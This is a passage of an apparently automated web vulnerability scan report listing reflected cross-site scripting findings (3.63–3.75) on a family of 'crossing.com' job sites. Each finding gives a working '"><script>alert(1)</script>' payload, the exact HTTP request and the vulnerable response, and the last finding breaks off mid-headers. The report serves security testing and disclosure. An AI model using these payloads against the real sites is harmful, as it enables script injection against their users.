<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.environmentalsafetyhealthcrossing.com/?9ccd0"><script>alert(1)</script>232068dd834=1">
...[SNIP]...

3.63. http://www.erpcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.erpcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8ac"><script>alert(1)</script>39847d1dfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9c8ac"><script>alert(1)</script>39847d1dfd=1 HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=s019do29bsalhop53kerknqic5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:23 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115915

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.erpcrossing.com/?9c8ac"><script>alert(1)</script>39847d1dfd=1">
...[SNIP]...

3.64. http://www.execcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.execcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b15"><script>alert(1)</script>6a4f6925f22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?58b15"><script>alert(1)</script>6a4f6925f22=1 HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9pmt5q5vtv14ne77hequloic12; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130398

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.execcrossing.com/?58b15"><script>alert(1)</script>6a4f6925f22=1">
...[SNIP]...

3.65. http://www.facilitiescrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facilitiescrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30174"><script>alert(1)</script>f3d7d566073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?30174"><script>alert(1)</script>f3d7d566073=1 HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9tjnfteftbcltcfl79d8lkupi5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.facilitiescrossing.com/?30174"><script>alert(1)</script>f3d7d566073=1">
...[SNIP]...

3.66. http://www.financialservicescrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.financialservicescrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c380"><script>alert(1)</script>e02d8294ca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8c380"><script>alert(1)</script>e02d8294ca2=1 HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:00 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mka5rd1b1uorq9h0i3qmfjjpj1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.financialservicescrossing.com/?8c380"><script>alert(1)</script>e02d8294ca2=1">
...[SNIP]...

3.67. http://www.foodservicescrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foodservicescrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298f0"><script>alert(1)</script>ffeb2e14da1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?298f0"><script>alert(1)</script>ffeb2e14da1=1 HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:01 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e48qt9e609488dmqmu8f8i5c36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109901

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.foodservicescrossing.com/?298f0"><script>alert(1)</script>ffeb2e14da1=1">
...[SNIP]...

3.68. http://www.fundraisingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fundraisingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28102"><script>alert(1)</script>aa78d4ce328 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?28102"><script>alert(1)</script>aa78d4ce328=1 HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:29 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nm20dvfkbsbjk7ge1970hpse21; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 98025

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.fundraisingcrossing.com/?28102"><script>alert(1)</script>aa78d4ce328=1">
...[SNIP]...

3.69. http://www.giscrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.giscrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bc72"><script>alert(1)</script>c4813ec5858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6bc72"><script>alert(1)</script>c4813ec5858=1 HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rir4ndkuk4qrb18g4imjg1qgc0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109405

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.giscrossing.com/?6bc72"><script>alert(1)</script>c4813ec5858=1">
...[SNIP]...

3.70. http://www.governmentcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.governmentcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b65"><script>alert(1)</script>8b14ad25588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?35b65"><script>alert(1)</script>8b14ad25588=1 HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rpbso16tqsrohpa7vs4tao5g00; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117169

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.governmentcrossing.com/?35b65"><script>alert(1)</script>8b14ad25588=1">
...[SNIP]...

3.71. http://www.healthcarecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.healthcarecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60560"><script>alert(1)</script>134d0f273ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?60560"><script>alert(1)</script>134d0f273ed=1 HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vlk8ael6dhgvt7bvpfsh8e5c36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.healthcarecrossing.com/?60560"><script>alert(1)</script>134d0f273ed=1">
...[SNIP]...

3.72. http://www.helpdeskcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.helpdeskcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca57"><script>alert(1)</script>85f9f0a617e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4ca57"><script>alert(1)</script>85f9f0a617e=1 HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5pc34q4kl032si755vlkdonr01; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.helpdeskcrossing.com/?4ca57"><script>alert(1)</script>85f9f0a617e=1">
...[SNIP]...

3.73. http://www.hospitalitycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hospitalitycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832b1"><script>alert(1)</script>22eb64144cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?832b1"><script>alert(1)</script>22eb64144cc=1 HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a67315d75br9o1gcjr9is307g2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129156

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hospitalitycrossing.com/?832b1"><script>alert(1)</script>22eb64144cc=1">
...[SNIP]...

3.74. http://www.hrcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hrcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb605"><script>alert(1)</script>bb1cbc2fed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fb605"><script>alert(1)</script>bb1cbc2fed9=1 HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ffv3i9vte4g564t23mih093eo2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hrcrossing.com/?fb605"><script>alert(1)</script>bb1cbc2fed9=1">
...[SNIP]...

3.75. http://www.hvaccrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hvaccrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ad5"><script>alert(1)</script>15b6379fa02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c4ad5"><script>alert(1)</script>15b6379fa02=1 HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uipdahmc9kasevm17lp9tie0s7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT
